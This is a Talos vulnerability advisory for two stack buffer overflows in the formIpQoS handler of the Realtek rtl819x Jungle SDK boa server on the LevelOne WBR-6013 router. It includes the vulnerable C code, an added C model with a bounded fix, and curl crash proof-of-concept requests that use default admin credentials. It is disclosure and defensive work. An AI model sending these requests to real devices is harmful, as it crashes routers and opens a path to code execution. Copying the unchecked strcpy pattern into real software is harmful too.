Talos Vulnerability Report

TALOS-2023-1895

Realtek rtl819x Jungle SDK boa formIpQoS stack-based buffer overflow vulnerabilities

July 8, 2024
CVE Number

CVE-2023-50243,CVE-2023-50244

SUMMARY

Two stack-based buffer overflow vulnerabilities exist in the boa formIpQoS functionality of Realtek rtl819x Jungle SDK v3.4.11. A specially crafted series of HTTP requests can lead to remote code execution. An attacker can send a series of HTTP requests to trigger these vulnerabilities.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

LevelOne WBR-6013 RER4_A_v3411b_2T2R_LEV_09_170623
Realtek rtl819x Jungle SDK v3.4.11

PRODUCT URLS

rtl819x Jungle SDK - https://www.realtek.com/en/
WBR-6013 - https://www.level1.com/level1_en/wbr-6013-n300-wireless-router-54069103

CVSSv3 SCORE

7.2 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

CWE

CWE-121 - Stack-based Buffer Overflow

DETAILS

The rtl819x Jungle SDK is an SDK for routers. It uses boa as its web server.

These Realtek rtl819x Jungle SDK vulnerabilities were found while researching the Levelone WBR-6013 router. We are going to explain these vulnerabilities from the perspective of the WBR-6013 router.

The WBR-6013 router runs a web server called boa, in the version shipped with the Realtek SDK. One of the SDK's APIs is /boafrm/formIpQoS, which allows modification of the quality of service settings. The function responsible for this API is boa's formIpQoS:

void formIpQoS(request *wp, char *path, char *query)
{
    [...]
    IPQOS_T entry, entry_tmp;
    [...]
    
    strAdd = req_get_cstream_var(wp, ("addQos"), "");
    [...]
    if (strAdd[0]) {
        strVal = req_get_cstream_var(wp, ("enabled"), "");
        if ( !strcmp(strVal, "ON")){
            intVal = 1;
        }
        [...]
        strBandwidth = req_get_cstream_var(wp, ("bandwidth"), "");
        [...]
[1]     strComment = req_get_cstream_var(wp, ("comment"), "");
        [...]
        if(no_rule_flag==0)
        {
            if ( strComment[0] ) {
[2]             strcpy((char *)entry.entry_name, strComment);
            }
            [...]
[3]          strName = req_get_cstream_var(wp, ("entry_name"), "");
            if(strName[0])
            {
                apmib_get(MIB_QOS_RULE_TBL_NUM, (void *)&entryNum);	

                for(j=1;j<=entryNum;j++)
                {
                    *((char *)&entry_tmp) = (char)j;
                    if ( apmib_get(MIB_QOS_RULE_TBL, (void *)&entry_tmp))
                    {
                        if((strlen(strName) == strlen(entry_tmp.entry_name)) && (memcmp(strName,entry_tmp.entry_name,strlen(strName))==0))	
                        {
                            strcpy(tmpBuf, (" entry name conflict!"));
                            goto setErr;
                        }
                    }
                }	
[4]              strcpy(entry.entry_name,strName);
            }
        }
        [...]
    }

    [...]
}

The function fetches the addQos and enabled request parameters. To reach the portions of code we are going to focus on, addQos has to be set (non-empty) and enabled has to have the value ON. Furthermore, the bandwidth request parameter has to be set to a value other than zero. If these requirements are met, the code at [1] is eventually reached.
At [1] the comment request parameter is fetched and copied at [2] into the entry_name struct member of the entry stack variable.
Eventually the code at [3] is also reached and the entry_name request parameter is fetched. If it does not match the name of any entry already registered, this value is copied at [4] into the same entry_name struct member of the entry stack variable.
Both copies lead to an issue, which we describe separately below.
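The following is an added example, not code from the Realtek SDK or from boa, that models the two copies at [2] and [4] (CVE-2023-50243 and CVE-2023-50244) and places the unbounded strcpy beside a bounded replacement that fails closed. The IPQOS_T layout, the size of entry_name, and the form_get() stand-in for req_get_cstream_var() are assumptions made for the demo; the request bodies are constructed to match the shape of the proofs of concept below.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed field size: the page does not show IPQOS_T, only that entry_name is a
 * fixed-size member of a struct living on formIpQoS's stack. */
#define ENTRY_NAME_LEN 32

typedef struct {
    unsigned char id;                 /* index written via *((char *)&entry_tmp) = j */
    char entry_name[ENTRY_NAME_LEN];
    unsigned int bandwidth;
} IPQOS_T;

/* Stand-in for boa's req_get_cstream_var(): returns a heap copy of the value of
 * `name` from an x-www-form-urlencoded body, or "" (also heap) when absent.
 * Percent-decoding is omitted. Like the real helper it imposes no length limit,
 * which is what makes the later strcpy dangerous. Caller frees. */
static char *form_get(const char *body, const char *name)
{
    size_t nlen = strlen(name);
    for (const char *p = body; ; ) {
        const char *end = strchr(p, '&');
        size_t plen = end ? (size_t)(end - p) : strlen(p);
        if (plen > nlen && strncmp(p, name, nlen) == 0 && p[nlen] == '=') {
            size_t vlen = plen - nlen - 1;
            char *v = malloc(vlen + 1);
            memcpy(v, p + nlen + 1, vlen);
            v[vlen] = '\0';
            return v;
        }
        if (!end) break;
        p = end + 1;
    }
    return calloc(1, 1);
}

/* The pattern at [2] and [4]: unbounded strcpy into the stack struct (CWE-121).
 * Shown only for shape; never feed it attacker-controlled input. */
void set_entry_name_unchecked(IPQOS_T *entry, const char *name)
{
    strcpy(entry->entry_name, name);
}

/* Bounded replacement: reject any value that does not fit together with its NUL. */
int set_entry_name_checked(IPQOS_T *entry, const char *name)
{
    size_t n = strlen(name);
    if (n >= sizeof entry->entry_name)
        return -1;
    memcpy(entry->entry_name, name, n + 1);
    return 0;
}

/* 1 if the value of `param` in `body` would overflow entry_name under strcpy. */
int value_overflows(const char *body, const char *param)
{
    char *v = form_get(body, param);
    int r = strlen(v) >= ENTRY_NAME_LEN;
    free(v);
    return r;
}

/* Hardened model of the formIpQoS path: same gating as the original (addQos set,
 * enabled == "ON", bandwidth != 0), then the comment copy ([2]) and the entry_name
 * copy ([4]) through the bounded setter. Returns 0 on success, -1 when a value
 * would overflow, -2 when the request never reaches the copies. */
int handle_form_ipqos(const char *body, IPQOS_T *entry)
{
    char *add = form_get(body, "addQos"), *en = form_get(body, "enabled");
    char *bw = form_get(body, "bandwidth"), *comment = form_get(body, "comment");
    char *name = form_get(body, "entry_name");
    int rc = -2;

    memset(entry, 0, sizeof *entry);
    if (add[0] && strcmp(en, "ON") == 0 && atoi(bw) != 0) {
        entry->bandwidth = (unsigned int)atoi(bw);
        rc = 0;
        if (comment[0] && set_entry_name_checked(entry, comment) != 0)
            rc = -1;
        if (rc == 0 && name[0] && set_entry_name_checked(entry, name) != 0)
            rc = -1;
    }
    free(add); free(en); free(bw); free(comment); free(name);
    return rc;
}

/* Constructed body with the PoC shape: gating parameters plus `param` set to `fill` 'A's. */
char *poc_body(const char *param, size_t fill)
{
    const char *prefix = "addQos=1&enabled=ON&bandwidth=1&";
    size_t plen = strlen(prefix) + strlen(param) + 1;
    char *b = malloc(plen + fill + 1);
    sprintf(b, "%s%s=", prefix, param);
    memset(b + plen, 'A', fill);
    b[plen + fill] = '\0';
    return b;
}

int main(void)
{
    IPQOS_T e;
    const char *ok = "addQos=1&enabled=ON&bandwidth=1&comment=video&entry_name=video";
    printf("benign: rc=%d name=%s\n", handle_form_ipqos(ok, &e), e.entry_name);
    for (const char *p = "comment"; p; p = strcmp(p, "comment") == 0 ? "entry_name" : NULL) {
        char *bad = poc_body(p, 600);
        printf("%s: overflows=%d hardened rc=%d\n", p, value_overflows(bad, p), handle_form_ipqos(bad, &e));
        free(bad);
    }
    return 0;
}
```

The unchecked setter is the advisory's pattern; the checked one is one correct fix, and returning an error (as the existing "entry name conflict!" path already does) is preferable to silent truncation, which would let a user create a rule whose stored name differs from the one they submitted.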

CVE-2023-50243 - comment

Because no check is performed on the size of the comment request parameter, a buffer overflow can occur at [2] in the stack variable entry. An attacker could exploit this vulnerability to achieve arbitrary code execution.

Exploit Proof of Concept

Because of a CSRF protection mechanism, using a specific API of the web server first requires loading the HTML page that would call that API:

curl --user admin:admin http://<DEVICE_IP>/ip6_qos.htm &>/dev/null 

After this request it is possible to use the /boafrm/formIpQoS API:

curl -d "addQos=1&enabled=ON&bandwidth=1&comment=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" -X POST -H "Content-Type: application/x-www-form-urlencoded" --user admin:admin http://<DEVICE_IP>/boafrm/formIpQoS

After this request the boa process will crash. The PoC uses the default admin credentials.

CVE-2023-50244 - entry_name

Because no check is performed on the size of the entry_name request parameter, a buffer overflow can occur at [4] in the stack variable entry. An attacker could exploit this vulnerability to achieve arbitrary code execution.

Exploit Proof of Concept

Because of a CSRF protection mechanism, using a specific API of the web server first requires loading the HTML page that would call that API:

curl --user admin:admin http://<DEVICE_IP>/ip6_qos.htm &>/dev/null 

After this request it is possible to use the /boafrm/formIpQoS API:

curl -d "addQos=1&enabled=ON&bandwidth=1&entry_name=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" -X POST -H "Content-Type: application/x-www-form-urlencoded" --user admin:admin http://<DEVICE_IP>/boafrm/formIpQoS

After this request the boa process will crash. The PoC uses the default admin credentials.

VENDOR RESPONSE

Realtek has provided updated software to its customers. LevelOne has declined to patch the issues in its software.

TIMELINE

2023-12-14 - Initial Vendor Contact
2023-12-22 - Vendor Disclosure
2024-05-20 - Vendor Patch Release
2024-07-08 - Public Release

Credit

Discovered by Francesco Benvenuto of Cisco Talos.